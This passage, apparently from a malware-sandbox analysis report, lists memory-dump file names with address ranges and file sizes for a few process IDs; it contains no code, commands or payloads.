                                                                • memory/3772-324-0x00007FFAC78B0000-0x00007FFAC78C4000-memory.dmp

                                                                  Filesize

                                                                  80KB

                                                                • memory/3772-74-0x00007FFAB3560000-0x00007FFAB3A93000-memory.dmp

                                                                  Filesize

                                                                  5.2MB

                                                                • memory/3772-73-0x00007FFAB3AA0000-0x00007FFAB3B6E000-memory.dmp

                                                                  Filesize

                                                                  824KB

                                                                • memory/3772-194-0x00007FFAB3AA0000-0x00007FFAB3B6E000-memory.dmp

                                                                  Filesize

                                                                  824KB

                                                                • memory/3772-195-0x00007FFAB3560000-0x00007FFAB3A93000-memory.dmp

                                                                  Filesize

                                                                  5.2MB

                                                                • memory/3772-72-0x00007FFAB3E90000-0x00007FFAB44F4000-memory.dmp

                                                                  Filesize

                                                                  6.4MB

                                                                • memory/3772-68-0x00007FFAC2820000-0x00007FFAC2853000-memory.dmp

                                                                  Filesize

                                                                  204KB

                                                                • memory/3772-312-0x00007FFAB3E90000-0x00007FFAB44F4000-memory.dmp

                                                                  Filesize

                                                                  6.4MB

                                                                • memory/3772-66-0x00007FFAC8600000-0x00007FFAC860D000-memory.dmp

                                                                  Filesize

                                                                  52KB

                                                                • memory/3772-64-0x00007FFAC7C20000-0x00007FFAC7C39000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                • memory/3772-62-0x00007FFAB3B70000-0x00007FFAB3CEF000-memory.dmp

                                                                  Filesize

                                                                  1.5MB

                                                                • memory/3772-60-0x00007FFAC7160000-0x00007FFAC7185000-memory.dmp

                                                                  Filesize

                                                                  148KB

                                                                • memory/3772-54-0x00007FFAC7AB0000-0x00007FFAC7ADB000-memory.dmp

                                                                  Filesize

                                                                  172KB

                                                                • memory/3772-52-0x00007FFACAC10000-0x00007FFACAC29000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                • memory/3772-326-0x00007FFAB30A0000-0x00007FFAB3153000-memory.dmp

                                                                  Filesize

                                                                  716KB

                                                                • memory/3772-49-0x00007FFAC86D0000-0x00007FFAC86F7000-memory.dmp

                                                                  Filesize

                                                                  156KB

                                                                • memory/3772-26-0x00007FFAB3E90000-0x00007FFAB44F4000-memory.dmp

                                                                  Filesize

                                                                  6.4MB

                                                                • memory/3772-291-0x00007FFAB30A0000-0x00007FFAB3153000-memory.dmp

                                                                  Filesize

                                                                  716KB

                                                                • memory/3772-277-0x00007FFAB3E90000-0x00007FFAB44F4000-memory.dmp

                                                                  Filesize

                                                                  6.4MB

                                                                • memory/3772-283-0x00007FFAB3B70000-0x00007FFAB3CEF000-memory.dmp

                                                                  Filesize

                                                                  1.5MB

                                                                • memory/3772-325-0x00007FFAC7AA0000-0x00007FFAC7AAD000-memory.dmp

                                                                  Filesize

                                                                  52KB

                                                                • memory/3772-327-0x000001F1D7660000-0x000001F1D7B93000-memory.dmp

                                                                  Filesize

                                                                  5.2MB

                                                                • memory/3772-338-0x00007FFAB3560000-0x00007FFAB3A93000-memory.dmp

                                                                  Filesize

                                                                  5.2MB

                                                                • memory/3772-337-0x00007FFAB3AA0000-0x00007FFAB3B6E000-memory.dmp

                                                                  Filesize

                                                                  824KB

                                                                • memory/3772-336-0x00007FFAC2820000-0x00007FFAC2853000-memory.dmp

                                                                  Filesize

                                                                  204KB

                                                                • memory/3772-335-0x00007FFAC8600000-0x00007FFAC860D000-memory.dmp

                                                                  Filesize

                                                                  52KB

                                                                • memory/3772-334-0x00007FFAC7C20000-0x00007FFAC7C39000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                • memory/3772-333-0x00007FFAB3B70000-0x00007FFAB3CEF000-memory.dmp

                                                                  Filesize

                                                                  1.5MB

                                                                • memory/3772-332-0x00007FFAC7160000-0x00007FFAC7185000-memory.dmp

                                                                  Filesize

                                                                  148KB

                                                                • memory/3772-331-0x00007FFAC7AB0000-0x00007FFAC7ADB000-memory.dmp

                                                                  Filesize

                                                                  172KB

                                                                • memory/3772-330-0x00007FFACAC10000-0x00007FFACAC29000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                • memory/3772-329-0x00007FFACC9C0000-0x00007FFACC9CF000-memory.dmp

                                                                  Filesize

                                                                  60KB

                                                                • memory/3772-328-0x00007FFAC86D0000-0x00007FFAC86F7000-memory.dmp

                                                                  Filesize

                                                                  156KB

                                                                • memory/3788-88-0x00007FFAB2523000-0x00007FFAB2525000-memory.dmp

                                                                  Filesize

                                                                  8KB

                                                                • memory/3788-98-0x00000181FEA20000-0x00000181FEA42000-memory.dmp

                                                                  Filesize

                                                                  136KB

                                                                • memory/3928-181-0x000001715F260000-0x000001715F268000-memory.dmp

                                                                  Filesize

                                                                  32KB